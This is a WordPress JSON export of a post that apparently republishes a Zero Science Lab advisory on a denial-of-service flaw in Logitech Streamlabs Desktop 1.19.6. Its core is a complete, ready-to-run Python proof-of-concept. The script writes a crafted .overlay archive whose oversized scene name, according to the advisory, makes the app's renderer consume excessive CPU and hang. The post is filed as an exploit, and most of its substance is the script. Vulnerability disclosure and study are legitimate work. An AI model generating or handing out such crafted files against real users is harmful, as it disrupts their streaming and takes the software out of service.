{"id":26115,"date":"2025-11-13T09:48:19","date_gmt":"2025-11-13T09:48:19","guid":{"rendered":"http:\/\/localhost\/?p=26115"},"modified":"2025-11-13T09:48:19","modified_gmt":"2025-11-13T09:48:19","slug":"logitech-streamlabs-desktop-1196-overlay-cpu-exhaustion","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=26115","title":{"rendered":"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-13T15:15:15&#8243;,&#8221;description&#8221;:&#8221;Title: Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion Advisory ID: ZSL-2025-5967&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;zeroscience&#8221;,&#8221;title&#8221;:&#8221;Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;ZSL-2025-5967&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;\\u003chtml\\u003e\\u003cbody\\u003e\\u003cp\\u003e#!\/usr\/bin\/env python3\\r\\n#\\r\\n#\\r\\n# Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion\\r\\n#\\r\\n#\\r\\n# Vendor: Logitech | General Workings, Inc.\\r\\n# Product web page: https:\/\/www.logitech.com | https:\/\/www.streamlabs.com\\r\\n# Affected version 1.19.6 (macOS\/Win)\\r\\n#\\r\\n# Summary: Streamlabs Desktop is a free streaming and recording software,\\r\\n# built on OBS Studio, for content creators to stream live to platforms\\r\\n# like Twitch, YouTube, and Facebook. It is designed to be beginner-friendly\\r\\n# and offers tools for creating engaging streams, such as customizable overlays,\\r\\n# alerts for viewer interactions, and the ability to add guests to a stream. \\r\\n#\\r\\n# Desc: A vulnerability exists in Streamlabs Desktop where importing a\\r\\n# crafted .overlay file can cause uncontrolled CPU consumption, leading\\r\\n# to a denial-of-service condition. The .overlay file is an archive\\r\\n# containing a config.json configuration. By inserting an excessively\\r\\n# large string into the name attribute of a scene object within config.json,\\r\\n# the application&#8217;s renderer process (Frameworks\/Streamlabs Desktop Helper\\r\\n# (Renderer).app) spikes to over 150% CPU and becomes unresponsive. This\\r\\n# forces the victim to terminate the application manually, resulting in\\r\\n# loss of availability. An attacker could exploit this by distributing\\r\\n# malicious overlay files to disrupt streaming operations.\\r\\n#\\r\\n# &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n# $ ps ucp 66595\\r\\n# USER     PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND\\r\\n# lqwrm 66595 100.3  0.6 1596218784 221344   ??  R     2:15PM   1:32.11 Streamlabs Desktop Helper (Renderer)\\r\\n# &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n#\\r\\n# Tested on: macOS Sequoia version 15.7.2, 15.7.1\\r\\n#            Microsoft Windows 11 25H2\\r\\n#            Microsfot Windows 10\\r\\n#\\r\\n#\\r\\n# Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic\\r\\n#                             @zeroscience\\r\\n#\\r\\n#\\r\\n# Advisory ID: ZSL-2025-5967\\r\\n# Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2025-5967.php\\r\\n#\\r\\n#\\r\\n# 15.10.2025\\r\\n#\\r\\n\\r\\n\\r\\nimport argparse\\r\\nimport json\\r\\nimport zipfile\\r\\nfrom pathlib import Path\\r\\n\\r\\ndef build_config(name: str) -\\u0026gt; dict:\\r\\n    return {\\r\\n        \\&#8221;schemaVersion\\&#8221;: 2,\\r\\n        \\&#8221;nodeType\\&#8221;: \\&#8221;RootNode\\&#8221;,\\r\\n        \\&#8221;scenes\\&#8221;: {\\r\\n            \\&#8221;schemaVersion\\&#8221;: 2,\\r\\n            \\&#8221;nodeType\\&#8221;: \\&#8221;ScenesNode\\&#8221;,\\r\\n            \\&#8221;items\\&#8221;: [\\r\\n                {\\r\\n                    \\&#8221;slots\\&#8221;: {\\r\\n                        \\&#8221;schemaVersion\\&#8221;: 1,\\r\\n                        \\&#8221;nodeType\\&#8221;: \\&#8221;SlotsNode\\&#8221;,\\r\\n                        \\&#8221;items\\&#8221;: []\\r\\n                    },\\r\\n                    \\&#8221;name\\&#8221;: name,\\r\\n                    \\&#8221;sceneId\\&#8221;: \\&#8221;scene_8e59eea4-d0f1-424f-8837-1aacd707700c\\&#8221;\\r\\n                }\\r\\n            ]\\r\\n        },\\r\\n        \\&#8221;transition\\&#8221;: {\\r\\n            \\&#8221;schemaVersion\\&#8221;: 1,\\r\\n            \\&#8221;nodeType\\&#8221;: \\&#8221;TransitionNode\\&#8221;,\\r\\n            \\&#8221;type\\&#8221;: \\&#8221;cut_transition\\&#8221;,\\r\\n            \\&#8221;settings\\&#8221;: {},\\r\\n            \\&#8221;duration\\&#8221;: 300\\r\\n        },\\r\\n        \\&#8221;nodeMap\\&#8221;: {\\r\\n            \\&#8221;schemaVersion\\&#8221;: 1,\\r\\n            \\&#8221;nodeType\\&#8221;: \\&#8221;NodeMapNode\\&#8221;\\r\\n        }\\r\\n    }\\r\\n\\r\\ndef create_overlay(output_path: Path, name_length: int = 1000) -\\u0026gt; Path:\\r\\n    scene_name = \\&#8221;A\\&#8221; * name_length\\r\\n    config_dict = build_config(scene_name)\\r\\n    config_bytes = json.dumps(config_dict, indent=2, ensure_ascii=False).encode(\\&#8221;utf-8\\&#8221;)\\r\\n\\r\\n    output_path.parent.mkdir(parents=True, exist_ok=True)\\r\\n\\r\\n    with zipfile.ZipFile(output_path, mode=\\&#8221;w\\&#8221;, compression=zipfile.ZIP_DEFLATED) as zf:\\r\\n        zf.writestr(\\&#8221;config.json\\&#8221;, config_bytes)\\r\\n\\r\\n    return output_path\\r\\n\\r\\ndef main():\\r\\n    parser = argparse.ArgumentParser(description=\\&#8221;Create a Streamlabs .overlay with a 1000 chars scene name.\\&#8221;)\\r\\n    parser.add_argument(\\&#8221;-o\\&#8221;, \\&#8221;&#8211;output\\&#8221;, type=Path, default=Path(\\&#8221;sample.overlay\\&#8221;),\\r\\n                        help=\\&#8221;Path to the output .overlay archive (default: sample.overlay)\\&#8221;)\\r\\n    parser.add_argument(\\&#8221;-n\\&#8221;, \\&#8221;&#8211;name-length\\&#8221;, type=int, default=1000,\\r\\n                        help=\\&#8221;Number of bytes to use for the scene name (default: 1000)\\&#8221;)\\r\\n\\r\\n    args = parser.parse_args()\\r\\n\\r\\n    out = create_overlay(args.output, name_length=args.name_length)\\r\\n    print(f\\&#8221;Created overlay: {out.resolve()}\\&#8221;)\\r\\n\\r\\n\\r\\nif __name__ == \\&#8221;__main__\\&#8221;:\\r\\n    main()\\r\\n\\u003c\/p\\u003e\\u003c\/body\\u003e\\u003c\/html\\u003e&#8221;,&#8221;sourceHref&#8221;:&#8221;http:\/\/zeroscience.mk\/codes\/logitech_streamlabs_cpu.txt&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;http:\/\/zeroscience.mk\/en\/vulnerabilities\/ZSL-2025-5967.php&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-13T15:15:15&#8243;,&#8221;description&#8221;:&#8221;Title: Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion Advisory ID: ZSL-2025-5967&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;zeroscience&#8221;,&#8221;title&#8221;:&#8221;Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;ZSL-2025-5967&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;\\u003chtml\\u003e\\u003cbody\\u003e\\u003cp\\u003e#!\/usr\/bin\/env python3\\r\\n#\\r\\n#\\r\\n# Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion\\r\\n#\\r\\n#\\r\\n#&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,7,11,5,107],"class_list":["post-26115","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability","tag-zeroscience"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=26115\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-13T15:15:15&#8243;,&#8221;description&#8221;:&#8221;Title: Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion Advisory ID: ZSL-2025-5967&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;zeroscience&#8221;,&#8221;title&#8221;:&#8221;Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;ZSL-2025-5967&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;u003chtmlu003eu003cbodyu003eu003cpu003e#!\/usr\/bin\/env python3rn#rn#rn# Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustionrn#rn#rn#...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=26115\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-13T09:48:19+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26115#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26115\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967\",\"datePublished\":\"2025-11-13T09:48:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26115\"},\"wordCount\":815,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\",\"zeroscience\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26115#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26115\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26115\",\"name\":\"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-13T09:48:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26115#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26115\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26115#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=26115","og_locale":"en_US","og_type":"article","og_title":"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-13T15:15:15&#8243;,&#8221;description&#8221;:&#8221;Title: Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion Advisory ID: ZSL-2025-5967&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;zeroscience&#8221;,&#8221;title&#8221;:&#8221;Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;ZSL-2025-5967&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;u003chtmlu003eu003cbodyu003eu003cpu003e#!\/usr\/bin\/env python3rn#rn#rn# Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustionrn#rn#rn#...","og_url":"https:\/\/zero.redgem.net\/?p=26115","og_site_name":"zero redgem","article_published_time":"2025-11-13T09:48:19+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=26115#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=26115"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967","datePublished":"2025-11-13T09:48:19+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=26115"},"wordCount":815,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","Security","tapic","Vulnerability","zeroscience"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=26115#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=26115","url":"https:\/\/zero.redgem.net\/?p=26115","name":"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-13T09:48:19+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=26115#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=26115"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=26115#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Logitech Streamlabs Desktop 1.19.6 (overlay) CPU Exhaustion_ZSL-2025-5967"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26115","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=26115"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26115\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=26115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=26115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=26115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}